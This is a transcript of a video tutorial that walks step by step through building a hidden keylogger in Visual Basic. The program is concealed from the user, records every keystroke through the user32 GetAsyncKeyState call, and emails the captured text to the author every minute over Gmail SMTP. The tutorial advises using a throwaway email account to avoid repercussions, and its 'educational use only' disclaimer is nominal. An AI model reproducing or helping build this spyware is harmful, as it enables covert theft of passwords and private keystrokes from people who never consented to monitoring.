everyone, and welcome back to another tutorial video. In this video I'm going to show you all how to make an email sending keylogger in Visual Basic. Now this is going to be completely hidden from the user, so they're not going to be able to see any indication that they are being logged, but this is going to send an email to an email address that you provide in the code at certain intervals, and it's going to track everything that the user actually types on their keyboard. So we're going to go ahead and jump right into it. Click on New Project. Then we're going to go Windows Form Application, and we'll do Email Sender Keylogger. Just name it something. Doesn't really make a difference what you name it. It's going to go ahead and create our project for us. So this is going to be very straightforward and simple. Even if you're not familiar with Visual Basic at all, you will be able to follow right along with me. So you're going to go ahead and click on Toolbox, and the first thing we need to do is we need to add in 2 timers. So we have timer 1 and timer 2, and then we're also going to just add in a text box. Now where we are going to hide this project, it doesn't really make a difference how you do this. You could just leave it small like it was. Just a personal thing for me, I like making it larger like this. So we're going to go ahead and call this txt logs. Now our 2 timers, one is going to be to send the email, and then the other is going to be to monitor the keystrokes. So the first one we'll just set to TMR email, enable it, and now for the interval, this is in milliseconds. So for 1 minute intervals, it's going to be 60,000 milliseconds. If you want it emailed quicker to you or slower to you, just Google the conversion rate for milliseconds to whatever, and then it'll set that up for you, and then you'll just enter that in the box. So for timer key, we're going to enable it, and we're going to set it to 5 milliseconds because no human being can actually type faster than 5 milliseconds. So we're going to go ahead and jump right into everything. Double click on timer email. That's going to open this up for us. First thing we need to do is go up to the top. We're going to put in option strict on. What that's going to do is it's going to stop any runtime errors in Visual Basic from displaying and showing to the user. So if there is an error, it's just automatically going to force the program to exit. And then while we're up here, we'll go ahead and import system.net.mail. And now we can go ahead and get started. So just click into your private function for the email. We're going to start off with a try statement. So what we're doing is we're setting our SMTP server settings first. What this is it's going to allow us to actually use the SMTP protocol and send our emails. So we're going to do SMTP server as new SMTP client. Pretty straightforward there. Then we're going to set up our SMTP settings. So the first thing we'll do is enable SSL and just set that to true. Then we're going to do SMTP server dot credentials equals new net.network credential. Now these credentials are going to be for the email that you want to log in with. You will have to provide the full email address and password so that the program can log in and send the email. I would recommend setting up a fake email account just so you can use this without potential repercussions. But other than that, it is up to you. And I do want to go ahead and say as well, this is strictly for educational use only. Any misuse of this is not my fault, and I am not liable for it. But other than that, we're going to set our port to 587, and we're also going to set our host to smtp.gmail.com, and that's going to be for Google. If you have another email provider, all you have to do is just Google search SMTP settings for Yahoo, Live, whatever it may be. So now we're going to set up our email function. So dim mail as new mail message. Mail equals new mail message. Mail.from is equal to, and then we'll set this to our email address for the sender. Also forgot you need to put this into parenthesis, and what you can also do, one second, is you can put a comma and then you can put a name for the actual well, why is that not working? Oh, you have to also assign new mail address for that to work. But anyway, you'll just do mail.to.add, and this is going to be the recipient. If you want it to go to another email address, all you have to do is provide the email address here. Otherwise, just re-enter the email. I'm just going to keep it all in the same inbox, that way you don't have to worry about it. Mail.subject equals new key log data. We're going to do mail.body equals txt_logs.text. Then we're going to finish that off with smtp server.send our message. So we've got that part set up. Now down here in the catch exception, all you have to do is type in me.close. Close. All that's going to do is if the program runs into an error, it's just automatically going to close out. It's not going to prompt the user or anything like that, which with this being hidden, we actually don't want to prompt the user of anything. So then go ahead and go back over to your form design. Now double click on your timer key. Now for this, we're going to go ahead and set up our actual key logger. We'll do as integer, dim key as string, and then we're going to dim I as an integer. Now before we go on any further, there is also something else up here we need to do. We're going to have to manually declare a private function. So we're going to do private declare function get async key state from the library user 32 parenthesis by val v key as long as short. So now that we've got that, we can go back on down here and we're going to set up a simple for statement. For I equals 290, set result equal to 0. Get async key state. Then we're going to set up an if statement. If I can type, if result is equal to less than 3,207.67, then key is equal to char I. And then inside that, if I is equal to 13, then key equals VB new line. Exit 4, and then we'll do end if and next I. So what that's going to do is it's going to look over each time the user presses the key It's going to find out which value that key has, and it's going to store it. And then specifically, if the user hits the enter key, it's going to create a new line because the enter key is assigned the value of 13. So that's pretty straightforward there. Now we're going to come down a couple lines and we're going to do another if statement. If key equals nothing, then if my.computer.keyboard shift key down, or else my.computer.keyboard caps lock, then txt logs text ampersand equals key, else txt logs text ampersand equal key to lower. And we're going to end our if statement. So now what that's doing right there for us is it's going to determine if the user is holding down the shift key or if they have caps lock enabled. If that's true, it's going to capitalize the letter in the text log. Otherwise, it's going to be entered in as a lowercase character. So that's pretty straightforward there. Now we're going to go ahead, go down to the end sub, drop down a couple lines. Then what you want to do is click on Form 1 Events. Then you're going to look for Form Closed. So just click on that. It's going to set up a new private sub function. So this is just going to be used for txt logs text ampersand equal new line, and Keylogger has been stopped at. Then we have the option of using now, and what that's going to do is display the current date and time, and we're going to make a new line. So that's going to be it for that one. Drop down a couple more, and then we're going to do the same thing, Form 1 Events. This time we're going to go to Load. So now this is where we get to actually hiding the information. So we're going to do show icon equals to false. Me.show in taskbar equals false. And then me.visible equals false. Then we're going to do txt logs text ampersand equals VB new line ampersand Keylogger started at and now, and another VB new line. So there's all of that. Now just going back up here, let's say at one point we want to be able to physically test the visibility of it and allow the user to see the program if they press a certain key combination. So what we can do is we can do if my.computer.keyboard alt key down, and also my computer keyboard control key down, and also key is equal to V, then me.visible is equal to true. So all that's doing is if the user presses Control Alt and V, it's going to show the program and set it to visible so that they can actually see what's going on with it. But that's going to be it there. Let's go ahead and run this and see if we get any kind of errors. So it's currently running. Let's see. Got an async key state issue. Stop that. project. Alright, so I did forget to mention what you need to do is you need to go to project, and then go to email sending keylogger properties or whatever it is that you named your program, or just hit Alt F7, and then target framework that actually needs to be set as 3.5. You'll get a message saying that it has to reload everything. Just click OK. Then that should fix it. So it is currently running. I'm going to go ahead and open up a notepad, testing the Keylogger program, and then I'll be right back once I get an email after about a minute or so, and then I'll show you that it does in fact work. Alright, so once you get logged into your email account, you should have an email here with the subject of new keylog data, and then as you can see, it shows up everything that I typed. This is from where I pressed the Windows key and R, ran Notepad, typed in testing the Keylogger program, and then this is actually where I opened up my internet browser and typed in Gmail to get to the email. But other than that, that's going to be it for this pretty straightforward tutorial. I mean, if you want to play around with the customization or anything like that, you can easily do that. If you have any questions or want some help on getting something else here, just let me know down in the comments section or shoot me an email, anything like that. But otherwise, that's going to be it for me on this tutorial, and I'll catch you all in the next one.